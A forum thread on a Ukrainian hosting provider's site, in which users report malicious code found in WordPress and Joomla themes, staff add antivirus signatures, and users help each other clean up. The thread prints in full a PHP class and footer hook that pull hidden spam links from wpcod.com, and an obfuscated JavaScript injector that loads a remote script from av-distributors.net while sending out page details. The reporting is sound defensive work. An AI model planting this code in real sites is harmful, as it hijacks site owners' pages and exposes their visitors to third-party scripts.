Мы используем cookie-файлы
Для оптимизации работы нашего сайта мы используем cookie-файлы. Продолжая использовать сайт, Вы соглашаетесь с использованием cookie-файлов.
Панель управления
  • Русский
  • Українська
  • UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 170-15-42  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  Vodafone
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Пожелания и предложения. Добавить в антивирус вредоносный код.


tod_m
4 года
5
Добавить в антивирус вредоносный код.

Добрый день.
В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
Предлагаю добавить его в ваш антивирус и помочь многим пользователям избавится от проблем.
Домен злоумышленников wpcod.com, их провайдеру уже выслана жалоба.
Ссылки с подтверждением вредоносности и код приведены ниже.
Код находится в function.php

class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

и в footer.php
< ?php if ($user_ID) : ?>< ?php else : ?>
< ?php if (is_single() || is_page() ) { ?>
< ?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php');
$links = new Get_links(); $links = $links->get_remote(); echo $links; ?>
< ?php } ?>
< ?php endif; ?>

Ссылки с жалобами на других сайтах:
Инструкция Левые ссылки в шаблонах. Осторожно с бесплатными шаблонами. - Бормотухи.НЕТ
Блог обычного человека: мысли, записи, мнения — Tarasevich.Info
Список рефспама | Valerevna.ru
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru

s0639541902
4 года
1

Да проблема существует и довольно распространена, за последний месяц у клиентов встречал такое двжады, причём во всех случаях вордпресс, и код 1 в 1 как у вас
во вложении скриншот кода + скриншот с сайта самих мудаков
[[upload]IMG_29092016_005753.png[[/upload]]
[[upload]IMG_29092016_001726.png[[/upload]]

alina03
4 года
1

+1
У нас теж таке зустрічалося.
Прохання добавити його в антивірус, якщо є така можливість.

oleksandr.franko
4 года
0

Это часто встречается в бесплатных шаблонах, не раз такое встречал.
Используют сайты жертв для черного сео либо для фишинга.
С таким нужно бороться!
В последней ссылке приведены еще 4 примера вредоносного кода. Их, я думаю, тоже стоить добавить в антивирус.
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru

eugen
4 года
2

Добавили тестовые сигнатуры, если что-то по ним найдется - завтра добавим в рабочий антивирус

tod_m
4 года
0

Спасибо!
Сообщите, пожалуйста, о результатах.

eugen
4 года
0

Да, напишу в этой теме. Завтра во второй половине дня будем знать

eugen
4 года
3

По результатам оставили три новых сигнатуры. В 4% хостинг аккаунтов обнаружились темы с такими включениями. Больше всего с подгрузкой ссылок с wpconfig .net

tod_m
4 года
0

Спасибо за информацию.
Будете добавлять в антивирус?

eugen
4 года
0

Да, сейчас при сканировании аккаунта уже будут находиться темы с такими включениями

rudenko
4 года
1

В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
© tod_m

Спасибо автору статьи за подробно описанную проблему с вирусом. Благодаря чему была добавлена новая сигнатура в антивирус.

tod_m
4 года
0

Вам спасибо за понимание и оперативность!

ppomobil
4 года
0

Спасибо за информацию, в footer в свое время удалил эту гадость, потому как лезла ссылка, а вот в functions не додумался залезть, сегодня пришло письмо с предупреждением.

tod_m
4 года
0

Сайты с которых эти ссылки загружаются и с которых продаются находятся на freehost.
29-ого написали им жалобу. Они ответили, что запросили информацию у клиента.
Кстати, у меня в акаунте нашло 4 зараженных сайта!
Но больше всего удивило то, что вредоносный код нашло на сайте который устанавливали в 2012 году!
Выходит они уже больше четырех лет распространяют зараженные темы на ВП.

oales00
4 года
0

як його видалити??

s0639541902
4 года
1

Если вы более или менее разбираетесь в вебе, то можете скачать проект и через допустим total commander или же
PhpStorm попробовать найти фрагменты кода приведённого в первом посте, (Если же вам об этом сообщил антивирус хостинга Украина, то там наверно есть указание на файл с вредоносным кодом.) Далее просто заходите в файл и удаляете фрагмент, а так же место где он объявляется, всё это описано в первом сообщении.
Если же у вас не желания самостоятельно удалить вредоносный код, можете обратиться к специалистам, думаю найти людей подходящего уровня не составит труда.
пс. Если хотите мы вам предоставим своего специалиста ( support@ubs.com.ua ) туда пишите сколько сайтов нужно почистить там уже договоримся.

fuzz1k
4 года
0

а у меня нет такого кода.как так?

tod_m
4 года
0

а у меня нет такого кода.как так? © fuzz1k

А почему Вы решили, что он у Вас должен быть?

fuzz1k
4 года
0


а у меня нет такого кода.как так? © fuzz1k
А почему Вы решили, что он у Вас должен быть?
© tod_m

есть он в function.php , я думал на моем сайте смотреть нужно. подскажите как его удалить? выделить и shift del ? так он не удаляется почему то

Евгений В.
4 года
0

подскажите как его удалить? выделить и shift del ? так он не удаляется почему то © fuzz1k

Это делается через "Хостинг" -- "Файл-менеджер", открыть папку с файлом, правой кнопкой мыши по файлу, пункт "Редактировать". Дальше - как в обычном текстовом редакторе все.

eley11
4 года
-2

Простите, я не понял, а как удалять этот код? Написано много, а толку от статьи нет. И админы ещё предлагают данную тему для знакомства. Должны в верху темы, красным цветом, крупным шрифтом описать метод удаления.

rudenko
4 года
0

Простите, я не понял, а как удалять этот код? © eley11

Попробуйте удалить все куски и класс Get_links и те строки, которые приведены в начале темы в footer.
Предварительно сделайте резервную копию файлов.

joli.ru
4 года
0

Подскажите пожалуйста нашла и удалила код из первого сообщения и появилась ошибка Parse error: syntax error, unexpected '}' in /home/meblisos/mebli-sos.zp.ua/www/wp-content/themes/craftsman_wp_theme/functions.php on line 580
я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно...

tod_m
4 года
0

я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно... © joli.ru

Приложите файл во вложении.
Посмотрим.

joli.ru
4 года
0

вот исходный не исправленный
functions.php

tod_m
4 года
0

Исправил.
Во вложении.
functions.php

joli.ru
4 года
1

спасибо огромное, заменила - всё работает!))

prokopchuk.m
4 года
2

Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
Находится он в файле index.php шаблона.

dotern
4 года
0

Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m

Вы, наверное, скачиваете шаблоны зараженные

tod_m
4 года
0

Вы, наверное, скачиваете шаблоны зараженные
© misha_into

Насколько я заметил по вордпресу, все бесплатные шаблоны которые не из официального репозитория - заражены.
Для этого мы и подняли эту тему, что б выявить и добавить в антивирус все известные сигнатуры вирусов.
Большенство пользователей даже не догадывается что в шаблоне может быть вирус.

dotern
4 года
0

Там как правило не вирус, а вставленная ссылка другого сайта с целью поднятия тиц и pr

tod_m
4 года
0

Там не просто ссылка, а функционал подгрузки ссылок с сервиса по черному СЕО.
Они их у себя на сайте продают и без ведома пользователя размещают на сайте.

dotern
4 года
0

Не приятная штука. Может есть какие-то характерные признаки такого кода. Можно описать здесь инструкцию как выявлять такой код в шаблоне.

tod_m
4 года
0

Может есть какие-то характерные признаки такого кода. © misha_into

Если есть примеры вредоносного кода то пишите их здесь, тех. поддержка хостинга рассмотрит их и если они актуальны - добавит в антивирус.

prokopchuk.m
4 года
0

Вы, наверное, скачиваете шаблоны зараженные © misha_into

Некоторым сайтам более 2-х лет и до этого времени проблем не было, шаблоны абсолютно разные от стандартных (чистые типа протостар, но модифицировано мной) до студийных платных шаблонов.

s0639541902
4 года
1

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Вопрос такой, prokopchuk.m показал до этого сигнатуру приведённую выше, вопрос к администрации хостинга, будут ли проверять хостинг на её наличие, или нужно создать отдельную тему?

Дмитрий Б.
4 года
0

Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m

Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения.

s0639541902
4 года
0

Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения. © Дмитрий Б.

Причиной является распространение бесплатных шаблонов, заражённых вирусами, делается это специально, цели тоже вполне понятны : Организация чёрных бирж ссылок, фишинг, кража данных,мошенничество с банковскими картами, шантаж и многое другое.

prokopchuk.m
4 года
0

Причиной является распространение бесплатных шаблонов © s0639541902

Повторюсь, это относится и до студийных платных шаблонов.

s0639541902
4 года
0

Это довольно странно читать, учитывая что многие студии делают свои шаблоны на основе бесплатных, и платные шаблоны не исключение, причём никто не гарантирует вам добросовестность их работы.

Участвовать в общении на этом форуме могут только зарегистрированные пользователи.